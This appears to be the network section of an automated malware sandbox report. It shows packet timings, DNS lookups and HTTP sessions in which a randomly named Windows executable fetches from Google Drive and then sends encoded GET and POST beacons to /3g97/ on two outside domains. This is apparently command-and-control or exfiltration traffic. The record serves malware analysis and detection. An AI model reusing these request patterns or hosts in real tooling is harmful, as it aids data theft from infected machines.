                                                            Apr 23, 2024 07:55:11.023601055 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.026123047 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.309238911 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531066895 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531094074 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531112909 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531125069 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531138897 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531152010 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531162977 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531174898 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531177044 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.531209946 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531220913 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.531224012 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.531272888 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.814096928 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814136028 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814148903 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814162970 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814176083 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814194918 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814196110 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.814237118 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.814237118 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.814239025 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814256907 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814304113 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814305067 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.814332962 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814368010 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814371109 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.814380884 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814418077 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814419031 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:11.814475060 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814487934 CEST8049720157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:11.814522028 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:12.538363934 CEST4972080192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:13.558290005 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:13.835774899 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:13.835895061 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:13.838498116 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.116461039 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.328778028 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.328799009 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.328809977 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.328856945 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.328875065 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.328962088 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.329034090 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.329097033 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.329097033 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.329139948 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.329200983 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.329246044 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.329339027 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.329463959 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.329729080 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.608248949 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608273029 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608284950 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608450890 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608464956 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608486891 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.608602047 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.608603954 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608618975 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608632088 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.608654976 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.608714104 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.609105110 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.609118938 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.609205961 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.609245062 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.609258890 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.609317064 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:14.609414101 CEST8049721157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:14.609478951 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:15.351917982 CEST4972180192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:16.370868921 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:16.646301985 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:16.646596909 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:16.649300098 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:16.923866987 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:16.924005032 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141360998 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141380072 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141396046 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141427040 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.141443014 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141499043 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.141513109 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141547918 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141587019 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.141658068 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141693115 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141736031 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.141792059 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141840935 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.141891956 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.418909073 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.418930054 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419014931 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419018984 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.419121981 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419137001 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419178009 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.419212103 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419258118 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.419611931 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419667959 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419704914 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419722080 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.419761896 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.419806957 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.420344114 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.420530081 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.420552969 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.420567036 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.420588970 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.420603991 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.421621084 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.421644926 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.421690941 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:17.421756029 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.421776056 CEST8049722157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:17.421824932 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:18.163695097 CEST4972280192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:19.182645082 CEST4972380192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:19.460280895 CEST8049723157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:19.460366011 CEST4972380192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:19.489536047 CEST4972380192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:19.767365932 CEST8049723157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:19.987687111 CEST8049723157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:19.987705946 CEST8049723157.7.107.63192.168.2.9
                                                            Apr 23, 2024 07:55:19.987891912 CEST4972380192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:19.990334034 CEST4972380192.168.2.9157.7.107.63
                                                            Apr 23, 2024 07:55:20.268843889 CEST8049723157.7.107.63192.168.2.9

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Apr 23, 2024 07:53:38.804501057 CEST5738653192.168.2.91.1.1.1
                                                            Apr 23, 2024 07:53:38.892579079 CEST53573861.1.1.1192.168.2.9
                                                            Apr 23, 2024 07:53:40.425780058 CEST5361153192.168.2.91.1.1.1
                                                            Apr 23, 2024 07:53:40.514552116 CEST53536111.1.1.1192.168.2.9
                                                            Apr 23, 2024 07:54:54.682166100 CEST6501353192.168.2.91.1.1.1
                                                            Apr 23, 2024 07:54:54.782021046 CEST53650131.1.1.1192.168.2.9
                                                            Apr 23, 2024 07:55:10.215060949 CEST5370753192.168.2.91.1.1.1
                                                            Apr 23, 2024 07:55:10.737234116 CEST53537071.1.1.1192.168.2.9
                                                            Apr 23, 2024 07:55:24.996218920 CEST6468853192.168.2.91.1.1.1
                                                            Apr 23, 2024 07:55:25.099883080 CEST53646881.1.1.1192.168.2.9
                                                            Apr 23, 2024 07:55:33.761066914 CEST6089553192.168.2.91.1.1.1
                                                            Apr 23, 2024 07:55:33.917493105 CEST53608951.1.1.1192.168.2.9

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Apr 23, 2024 07:53:38.804501057 CEST192.168.2.91.1.1.10xc0abStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:53:40.425780058 CEST192.168.2.91.1.1.10xc78fStandard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:54:54.682166100 CEST192.168.2.91.1.1.10xf2c3Standard query (0)www.jthzbrdb.funA (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:55:10.215060949 CEST192.168.2.91.1.1.10x3d37Standard query (0)www.a-two-spa-salon.comA (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:55:24.996218920 CEST192.168.2.91.1.1.10x2d52Standard query (0)www.ordinarythoughts.orgA (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:55:33.761066914 CEST192.168.2.91.1.1.10xcc7aStandard query (0)www.mz3fk6g3.sbsA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Apr 23, 2024 07:53:38.892579079 CEST1.1.1.1192.168.2.90xc0abNo error (0)drive.google.com142.251.41.14A (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:53:40.514552116 CEST1.1.1.1192.168.2.90xc78fNo error (0)drive.usercontent.google.com142.251.35.161A (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:54:54.782021046 CEST1.1.1.1192.168.2.90xf2c3No error (0)www.jthzbrdb.fun80.240.20.220A (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:55:10.737234116 CEST1.1.1.1192.168.2.90x3d37No error (0)www.a-two-spa-salon.com157.7.107.63A (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:55:25.099883080 CEST1.1.1.1192.168.2.90x2d52Name error (3)www.ordinarythoughts.orgnonenoneA (IP address)IN (0x0001)false
                                                            Apr 23, 2024 07:55:33.917493105 CEST1.1.1.1192.168.2.90xcc7aNo error (0)www.mz3fk6g3.sbs172.217.16.36A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • drive.google.com
                                                            • drive.usercontent.google.com
                                                            • www.jthzbrdb.fun
                                                            • www.a-two-spa-salon.com

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.94971980.240.20.220806540C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 23, 2024 07:54:55.001136065 CEST458OUTGET /3g97/?Z0cP=R2YdndZh2B6&jJEDgF=0byNfP8xYbFTvv3QATAnaN6BV2N8MY8k+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhJjDvkLInRorT+v+nJR1Y5dgJEbJjbg== HTTP/1.1
                                                            Host: www.jthzbrdb.fun
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                            Apr 23, 2024 07:54:55.170525074 CEST1289INHTTP/1.1 404 Not Found
                                                            Server: nginx
                                                            Date: Tue, 23 Apr 2024 05:54:55 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 1409
                                                            Connection: close
                                                            Vary: Accept-Encoding
                                                            ETag: "629dd94c-581"
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 34 30 34 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 37 35 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 68 6f 73 74 6e 61 6d 65 2e 64 6f 6d 61 69 6e 2e 74 6c 64 2f 22 3e 68 6f 73 74 6e 61 6d 65 2e 64 6f 6d 61 69 6e 2e 74 6c 64 3c 2f 61 3e 3c 2f 70 3e 0a 20 20 20 20 3c 68 31 3e 34 30 34
                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 &mdash; Page Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="404 - Page Not Found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:375px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:375px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://hostname.domain.tld/">hostname.domain.tld</a></p> <h1>404
                                                            Apr 23, 2024 07:54:55.170547009 CEST309INData Raw: 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 70 61 67 65 20 79 6f 75 20 77 65 72 65 20 74 72 79 69 6e 67 20 74 6f 20 72 65
                                                            Data Ascii: </h1> <h2>Page Not Found</h2> <div> The page you were trying to reach does not exist. Or, maybe it has moved. You can start again from <a href="http://hostname.domain.tld/">home</a> or go back to the <a href="javascript


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.949720157.7.107.63806540C:\Program Files (x86)\fmIyHTjwiiTPdTeNNnFlBdZytaJkWZcwFAkyAxIOv\NJeXDhPqkKUqTApfiOc.exe
                                                            TimestampBytes transferredDirectionData
                                                            Apr 23, 2024 07:55:11.026123047 CEST739OUTPOST /3g97/ HTTP/1.1
                                                            Host: www.a-two-spa-salon.com
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 195
                                                            Cache-Control: max-age=0
                                                            Origin: http://www.a-two-spa-salon.com
                                                            Referer: http://www.a-two-spa-salon.com/3g97/
                                                            User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
                                                            Data Raw: 6a 4a 45 44 67 46 3d 34 36 6a 39 69 4f 35 61 67 71 4d 35 72 4d 78 46 39 53 47 65 4f 74 31 68 4e 66 42 67 4f 2b 75 6d 48 71 34 64 4c 4a 67 6b 4b 52 42 31 65 38 64 2f 50 6e 43 4f 58 73 31 2b 51 34 69 74 33 74 6a 61 6a 77 61 5a 53 50 70 6e 66 63 32 32 5a 7a 4f 50 45 42 62 51 61 6c 62 58 67 50 6a 71 6e 69 6e 54 2f 55 34 34 59 57 39 72 57 6d 58 4a 55 77 39 55 79 77 30 5a 56 2b 54 44 6e 41 4f 36 64 68 46 57 2f 49 72 62 47 71 72 62 46 4c 47 73 4e 37 39 57 34 46 55 35 2f 7a 66 6e 66 41 30 56 75 67 74 70 51 37 78 49 46 53 59 46 41 34 39 70 4c 37 42 50 49 34 74 7a 32 6e 50 69 64 74 4a 73
                                                            Data Ascii: jJEDgF=46j9iO5agqM5rMxF9SGeOt1hNfBgO+umHq4dLJgkKRB1e8d/PnCOXs1+Q4it3tjajwaZSPpnfc22ZzOPEBbQalbXgPjqninT/U44YW9rWmXJUw9Uyw0ZV+TDnAO6dhFW/IrbGqrbFLGsN79W4FU5/zfnfA0VugtpQ7xIFSYFA49pL7BPI4tz2nPidtJs
                                                            Apr 23, 2024 07:55:11.531066895 CEST1289INHTTP/1.1 404 Not Found
                                                            Date: Tue, 23 Apr 2024 05:55:11 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Server: Apache
                                                            X-Powered-By: PHP/8.2.18
                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                            Link: <http://a-two-spa-salon.com/wp-json/>; rel="https://api.w.org/"
                                                            Data Raw: 34 35 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 70 63 22 20 6c 61 6e 67 3d 22 6a 61 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 49 45 5d 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0d 0a 3c 74 69 74 6c 65 3e e3 83 9a e3 83 bc e3 82 b8 e3 81 8c e8 a6 8b e3 81 a4 e3 81 8b e3 82 8a e3 81 be e3 81 9b e3 82 93 e3 81 a7 e3 81 97 e3 81 9f 20 7c 20 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 83 97 e3 83 a9 e3 82 a4 e3 83 99 e3 83 bc e3 83 88 e3 82 b5 e3 83 ad e3 83 b3 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 61 2d 74 77 6f 2d 73 70 61 2d 73 61 6c 6f 6e 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 41 2d 74 77 6f 20 e3 83 98 e3 83 83 e3 83 89 e3 82 b9 e3 83 91 ef bc 86 e3 